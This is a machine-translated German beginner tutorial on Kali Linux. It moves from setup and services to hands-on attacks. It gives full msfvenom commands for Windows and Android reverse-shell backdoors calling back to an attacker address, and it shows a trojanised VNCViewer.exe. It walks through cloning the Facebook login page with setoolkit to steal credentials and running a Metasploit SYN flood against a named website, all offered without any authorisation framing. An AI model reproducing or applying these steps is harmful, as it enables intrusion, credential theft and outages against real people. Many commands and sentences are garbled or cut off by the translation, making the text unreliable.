Kali Linux -Grundlagen

Kali Linux -Grundlagen
Kali Linux ist eine Debian -basierte Verteilung für ethische Hacker, Penetrationstester, Sicherheitsforscher und Enthusiasten. Es handelt. Kali Linux Standard -Desktop -Umgebung ist GNOME, aber sie bietet auch eine Vielzahl anderer Desktop -Umgebungen, darunter KDE, Mate, LXDE und andere. Es kann auf verschiedenen Systemtypen installiert werden. Es verfügt außerdem über eine tragbare Version für Android-Geräte namens Nethunter, die innerhalb des Android-Betriebssystems verwendet werden kann und mit vorinstallierten Tools und Skripten ausgestattet ist, die eine Portabilität bei der Durchführung von Sicherheitsprüfungen oder Penetrationstests bieten.

Warum sollten Sie Kali Linux verwenden?

Kali Linux wird hauptsächlich von Penetrationstestern, Sicherheitsabschlüssen, Forensik -Forschern und Forschern verwendet. Es hat fast jedes Tool oder Skript vorinstalliert, das für die oben genannten Zwecke verwendet werden kann. Sie können Kali Linux verwenden, um WiFi -Netzwerke zu knacken, Open Source Intelligence (OSINT) auf jemandem auszuführen, Websites und Netzwerke und viele mehr zu hacken.

Außer ethischer Hacking verfügt Kali Linux auch über eine Reihe von Tools für Forensikuntersuchungen. Forensik ist ein weiterer wichtiger und aufstrebender Sicherheitszweig, dessen Hauptzweck darin besteht. Die Forensikuntersuchung hilft dabei. Kali Linux verfügt.

Sich mit Kalis Umgebung vertraut machen

Kali ist nicht für normale Benutzer hergestellt und es ist nicht sehr benutzerfreundlich wie Windows oder Ubuntu. Die Standardumgebung ist root, was nicht sehr einfach zu bedienen ist und für Noobs ziemlich gefährlich ist. Es fehlen auch einige grundlegende Dienstprogramme wie Snap, VirtualBox und andere nützliche Dienstprogramme, die in Ubuntu vorhanden sind.

Alles der Reihe nach

Das erste, was Sie tun müssen, ist, einen Nicht-Root-Benutzer zu machen

root@kali: ~# adduser kali
Hinzufügen von Benutzern 'Kali'…
Hinzufügen einer neuen Gruppe 'Kali' (1002)…
Hinzufügen neuer Benutzer 'Kali' (1002) mit Gruppe 'Kali'…
Erstellen von Home Directory '/Home/Kali'…
Kopieren von Dateien aus '/etc/skel'…
Neues Kennwort:
… Schnipsel…
root@kali: ~# usermod -Ag sudo kali
Initialisieren Sie die PostgreSQL -Datenbank von Metasploit Framework
root@kali: ~# msfdb init
Erstellen von Datenbankbenutzer 'MSF'
Geben Sie das Passwort für eine neue Rolle ein:
Geben Sie es erneut ein:
Erstellen von Datenbanken 'MSF' und 'msf_test'
… Schnipsel…

Fügen Sie Ihren folgenden Zeilen zu Ihren “/etc/APT/Quellen hinzu.Liste ”Datei

Deb http: // http.Kali.org/kali kali-rolling main-Beitrag nicht frei
# Für den Zugang zum Quellpaket die folgende Zeile für den Zugriff auf den Quellpaket in Kenntnis nehmen
# Deb-Src http: // http.Kali.org/kali kali-rolling main-Beitrag nicht frei
Installieren Sie einige andere nützliche Tools.
root@kali: ~# APT -Get Update && Apt Upgrade -y
root@kali: ~# APT-Get Installieren Sie VirtualBox VirtualBox-DKMS Gobuster Tor-Browser
OpenVPN HTOP Atom Deepin -terminaler Tilix -y

Verwalten von Kalis Standarddiensten

Kali verfügt über viele vorinstallierte nicht standardmäßige Dienste wie PostgreSQL, MySQL, SSH, HTTP. Wenn Sie nicht ordnungsgemäß konfiguriert sind, beginnen diese Dienste als Hintergrundvorgang, wenn Ihr Kali Linux startet und diese offenen Ports eine Bedrohung für die Sicherheit Ihres Systems darstellen können.

In diesem Abschnitt werden wir uns untersuchen, wie diese Dienste funktionieren und wie Sie sie ordnungsgemäß konfigurieren können und wie Sie sie verwenden können. Die Standardmethode zum Konfigurieren eines Tools oder eines Dienstes ist die LEAD -LEADME -DOC -Datei. Die ReadMe -Datei enthält die Standardverfahren, um ein Tool oder einen Dienst zu konfigurieren und zu verwenden. ReadMe -Dateien befinden sich normalerweise im Ordner „/usr/share/doc/[tool_name]/readme“.

Secure Shell Service (SSH)

Secure Shell (SSH) wurde für lange Zeit als Standard -Tool verwendet, um Befehle, Übertragungsdateien und andere Remote -Administrationszwecke auszuführen. Das Paket umfasst SSH (Client) und SSHD (Service), um andere Maschinen aus der Ferne zu steuern.

Der SSH -Service wird standardmäßig nicht gestartet, wenn Kali startet. Sie können ihn durch Eingabe beginnen,

root@kali: ~ $ Service SSH START
root@kali: ~ $ netstat -antp | grep -i sshd
TCP 0 0 0.0.0.0:22 0.0.0.0:* Hören Sie 6601/SSHD an
TCP6 0 0 ::: 22 :::* Hören Sie 6601/SSHD

Wenn Sie SSHD jedes Mal beginnen möchten, wenn sich Ihr Kali startet. Typ

root@kali: ~ $ update-rc.D SSH aktivieren

Wenn Sie möchten, dass sich jemand über SSH bei Ihrem PC anmeldet, wird der Benutzern und das Passwort Ihres Kali für die Anmeldeauthentifizierung verwendet. Ändern Sie also besser Ihr Standardkennwort „Toor“ auf etwas Sicheres.

root@kali: ~ $ passwd
Passwort für root ändern.
Aktuelles Passwort:
Neues Kennwort:
Neues Passwort senden:
PassWD: Passwort erfolgreich aktualisiert

Laden Sie nun den SSH -Service neu, um Änderungen zu beeinflussen

root@kali: ~ $ Service SSH Reload

HTTP -Service

Der HTTP -Service ist bei der Ausführung ethischer Hacking -Aufgaben sehr vorteilhaft. Es kann verwendet werden, um gefälschte Phishing -Webseiten und -website zu hosten, um Dateien auf Remote -Opfer -Server zu übertragen. Wenn Webanwendungen jeden Tag immer beliebter werden, ist es jetzt wichtiger, Kenntnisse zu haben, um HTTP -Server wie Apache zu verstehen und zu betreiben.

Apache ist ein HTTP-Server, der in Kali vorinstalliert ist. Der HTTP -Dienst von Apache ist standardmäßig deaktiviert. Sie können ihn jedoch mit dem folgenden Befehl starten.

root@kali: ~ $ service apache2 starten

Apache hostet die Standard -Debian -Webseite auf Ihrer lokalen Domain unter Standard HTTP -Port 80. Gehen Sie zu http: // localhost: 80/

Um es jedes Mal zu beginnen, wenn Ihr Kali startet, geben Sie ein, geben Sie es an

root@kali: ~ $ update-rc.D Apache2 aktivieren

Sie können Apache auch auf dem nicht standardmäßigen Port konfigurieren, indem Sie seine Konfigurationsdatei ändern (/etc/apache2/ports.conf)

root@kali: ~ $ nano/etc/apache2/ports.Conf

Speichern Sie die Datei und führen Sie dann aus

root@kali: ~ $ service apache2 neu starten

Jetzt sendet Apache auf Port "1234" anstelle von Standard -Port 80.

Wenn Sie die vollständige Dokumentation des Apache -Servers lesen möchten, gehen Sie zu Verzeichnis „/usr/Share/doc/apache2/“, geben Sie ein

root@kali: ~ $ cd/usr/share/doc/apache2/
root@kali:/usr/share/doc/apache2 $ gzip -Decompress Readme.Debian.gz
root@kali:/usr/share/doc/apache2 $ nano readme.Debian

Eine Liste einiger nützlicher Befehle

Lokalisieren Es wird verwendet, um eine Datei unter Linux zu finden, bevor Sie diesen Befehl verwenden, Sie müssen zuerst Ihre Datenbank aktualisieren

root@kali: ~# aktualisiertb
root@kali: ~# Suchen Sie UQJHSSVF.JPEG
/root/uqjhssvf.JPEG

finden ist aggressiver und stützt sich nicht auf Datenbank. Es sucht rekursiv nach der Datei im gegebenen Verzeichnis und seinen Unterverzeichnissen.

root@kali: ~# finden ./ -name main.py
./Desktop/Main.py

wget kann zum Herunterladen einer Webseite oder einer Datei in Terminal verwendet werden.

root@kali: ~# wget tinyTuba.com
--2019-05-11 08: 58: 48-- http: // TinyTuba.com/
TinyTuba lösen.com (TinyTuba.com)… 52.216.129.66
Verbindung zu TinyTuba anschließen.com (TinyTuba.com) | 52.216.129.66 |: 80… verbunden.
HTTP -Anfrage gesendet, erwartet auf die Antwort… 200 OK
Länge: 1551 (1.5K) [Text/HTML]
Speichern auf: 'Index.html '
Index.HTML 100%[==========================>] 1.51k --.-KB/s in 0s
2019-05-11 08:58:50 (56.5 MB/s) - 'Index.HTML 'gespeichert [1551/1551]
root@kali: ~# Firefox Index.html

Spitze Gibt Ihnen Informationen zu Ihrer CPU, Ihrer Speicherverwendung und anderen Statistiken.

Geschichte Zeigen Sie die Liste der früheren Befehle an, die Sie in Ihr Terminal eingegeben haben.

Einige andere nützliche Befehle, die Sie im Internet finden können LS, RM, RMDIR, Adduser, Deluser, Service, Nano, Katze, mehr, weniger, Uname, Whoami usw

Erzeugen Sie bösartige Hintertüren

Sie können böswillige Exe -Binärdateien mit "MSFvenom" Kali Linux erzeugen und sie auf dem System eines anderen installieren, um es aus der Ferne zu steuern.

root@kali: ~ $ msfvenom -a x86 -Plattform Windows -b '\ x00' -p Windows/MeterPreter/Reverse_tcp
LHOST = [IP -Adresse des Angreifers] LPORT = [Angreifer Port Nr.] -F exe> Spaß.exe
Gefunden 11 kompatible Encoder
Versuch, Payload mit 1 Iterationen von x86/shikata_ga_nai zu codieren
x86/shikata_ga_nai gelang es mit Größe 368 (Iteration = 0)
x86/shikata_ga_nai mit der endgültigen Größe 368 ausgewählt
Nutzlastgröße: 368 Bytes
Endgültige Größe der EXE -Datei: 73802 Bytes
root@kali: ~ $ ls Spaß.exe
Spaß.exe
root@kali: ~ $ Datei Spaß.exe
Spaß.EXE: PE32 Executable (GUI) Intel 80386 für MS Windows

Um die Hintertür für X64 -Architektur -Windows -Systeme zu generieren, geben Sie den folgenden Befehl ein.

root@kali: ~ $ msfvenom -plattform windows -b '\ x00' -p windows/x64/meterPreter/reverse_tcp
LHOST = [IP -Adresse des Angreifers] LPORT = [Angreifer Port Nr.] -F exe> Spaß.exe
[-] Kein Bogen ausgewählt, ausgewählt ARCH: x64 aus der Nutzlast
3 kompatible Encoder gefunden
… Schnipsel…
root@kali: ~ $ Datei Spaß.exe
Spaß.EXE: PE32+ Executable (GUI) x86-64 für MS Windows

Einbetten von Hintertooren in legitime Anwendungen mit Kali

Sie können Ihren böswilligen Backdoor -Code auch in eine harmlose EXE -Datei wie Adobe Reader Installer oder einen ausführbaren Media Player einbinden. Die daraus resultierende ausführbare Datei wird wie eine legitime Softwareanwendung aussehen, aber wenn sie auf dem Computer des Opfers ausgeführt wird, wird Ihre böswillige Hintertür neben dieser legitimen Anwendung durchgeführt, was zu Kompromisse des PCs des Opfers führt.

In Kali Linux sind bereits einige Windows -ausführbare Dateien vorhanden, mit denen wir Demonstration verwenden werden.

root@kali: ~ $ ls/usr/share/window-binaries/
Backdoors/ exe2bat.Exe Fport/ Klogger.exe nbtenum/ plink.EXE VNCViewer.exe whoami.exe
enumplus/ fgdump/ hyperion/ mbenum/ nc.exe radmin.exe wget.exe

Wir werden unsere Nutzlast in „VNCViewer.exe ”ausführbare Datei.

root@kali: ~ $ msfvenom -a x86 -plattform windows -x/usr/share/window -binaries/vncViewer.exe
-K -p Windows/MeterPreter/Reverse_tcp lhost = [Angreifer IP] LPORT = [Angreifer -Port]
-e x86/shikata_ga_nai -i 3 -b "\ x00" -f exe -o vncviewer.exe
Gefunden 1 kompatible Encoder
Versuch, Payload mit 3 Iterationen von x86/shikata_ga_nai zu codieren
… Schnipsel…
Nutzlastgröße: 422 Bytes
Endgültige Größe der EXE -Datei: 421376 Bytes
Gespeichert als: VNCViewer.exe

Erzeugen von Android -Hintertoors

Um Android -Telefone aus der Ferne zu steuern, können Sie böswillige APK -Dateien mit MSFvenom generieren.

root@kali: ~ $ msfvenom -p Android/MeterPreter/Reverse_tcp lhost = [Angreifer IP]
LPORT = [Angreifer Port Nr.] R> was auch immer.apk
[-] Es wurde keine Plattform ausgewählt, wobei die Auswahl von MSF :: Modul :: Plattform :: Android aus der Nutzlast
[-] Kein Bogen ausgewählt, ausgewählt Bogen: Dalvik aus der Nutzlast
Kein Encoder oder Badchars angegeben, die Rohnutzlast ausgeben
Nutzlastgröße: 10087 Bytes

Social Engineering mit Setoolkit

Social Engineering ist die Verwendung von Täuschung, um jemanden dazu zu bringen, seine vertraulichen oder persönlichen Informationen zu enthüllen, die für böswillige Zwecke missbraucht werden können.

Die am häufigsten verwendete Technik des Social Engineering ist Phishing, bei der Sie versuchen, Nachrichten, E -Mails oder Telefonanrufe zu senden, um persönliche, insbesondere Geldbezogene Informationen zu erhalten. Bei Phishing Attack ist der Empfänger einer E -Mail davon überzeugt, dass er die E -Mail von einer echten Quelle wie einer Bank oder einer Regierungsabteilung erhalten hat, und dann dazu gebracht, seine sensiblen Anmeldeinformationen zu enthüllen.

In dieser Demonstration klonen wir eine Facebook -Anmeldeseite mit Setoolkit und hosten diese Seite auf unserem HTTP -Server und senden dann die IP -Adresse unseres HTTP -Servers an das Opfer. Wenn sich Opfer auf unserer gefälschten Facebook -Anmeldeseite anmeldet, sendet diese Seite seinen Benutzernamen und sein Passwort an unseren Kali -Computer.

Typ setoolkit Im Terminal wird Setoolkit geöffnet

  • Wählen Sie aus dem Menü: [Wählen Sie 1] Angriffe mit Sozialmotiven
  • Wählen Sie aus dem Menü: [Wählen Sie 2] Website -Angriffsvektoren
  • Wählen Sie aus dem Menü: [wählen
  • Wählen Sie aus dem Menü: [Wählen Sie 2] Site -Kloner
  • Wählen Sie aus dem Menü: Geben Sie die IP -Adresse des lokalen Computers ein
  • Wählen Sie aus dem Menü: Geben Sie die URL zum Klon ein: www.Facebook.com
  • Drücken Sie die Eingabetaste und geben Sie y ein

Wenn das Opfer unsere IP -Adresse in seinem Browser eingibt, wird ihm unsere gefälschte Facebook -Login -Seite präsentiert, die wir früher erstellt haben. Wir müssen warten, bis das Opfer seinen Benutzernamen und sein Passwort in unsere geklonte Seite betritt. Die gefälschte Facebook -Seite sieht so aus,

Solange der Benutzer seine Anmeldeinformationen eingibt, zeigt Setoolkit sie auf dem Terminal an.

Diese Demo befand sich im lokalen Netzwerk. Wenn Sie dies auf öffentlicher IP tun möchten, müssen Sie entweder eine Portweiterleitung in Ihrem Router durchführen oder NGROK für öffentliche IP- und Portnummer verwenden.

Denial of Service (DOS) Angriff mit Metasploit

Die Ablehnung des Dienstes (DOS) ist eine Art Angriff auf ein System oder ein Netzwerk, das die Zugänglichkeit von Systemressourcen für seine legitimen Benutzer verringert oder einschränkt. Der Zweck eines DOS-Angriffs besteht nicht darin, sensible Informationen zu stehlen, stattdessen versucht Angreifer, das Opfersystem mit nicht legitimen Serviceanfragen zur Überlastung seiner Ressourcen zu überfluten.

Ein DDOS-Angriff (Distributed Denial-of-Service) benötigt eine große Anzahl von Systemen (als Zombies bezeichnet), die ein einzelnes Ziel angreifen. Ein einzelner DOS -Angriff kann große Unternehmenserver und Netzwerke nicht beeinflussen. Deshalb ist DDOS effektiver und tödlicher. Es ist auch schwierig, DDOs zu verfolgen und zu blockieren, da Hunderte und Tausende Zombie -Systeme einen einzelnen Host angreifen.

Sie sind viele Tools und Skripte für DOS- und DDOS -Angriffe, aber wir werden ein Hilfsmodul von Metasploit zur Demonstration verwenden. Wir werden versuchen, eine Beispielwebsite „www) abzubauen.Jarusa.com ”.

Gehen Sie zuerst zu https: // www.isitdownrightnow.com/ und bestätigen Sie, dass die Website in Betrieb ist

Die Website ist auf. Öffnen Sie nun die Metasploit -Framework -Konsole in Ihrem Terminal.

root@kali: ~ $ msfconsole
… Schnipsel…
MSF5> Auxiliary/DOS/TCP/Synflood verwenden

Erfahren www.Jarusa.comIP -Adresse und setzen Sie sie als Rhost ein und führen Sie den Angriff aus

Nach einer Weile sehen Sie, dass diese Website nicht verfügbar ist. Bestätigen Sie es mit https: // www.isitdownrightnow.com/

ABSCHLUSS

Kali Linux ist ein Zuhause für ethische Hacker, und dieses Tutorial hat Sie hoffentlich zu den Grundlagen von Kali Linux, dem, was es tun kann und wie man mit seiner Verwendung beginnt.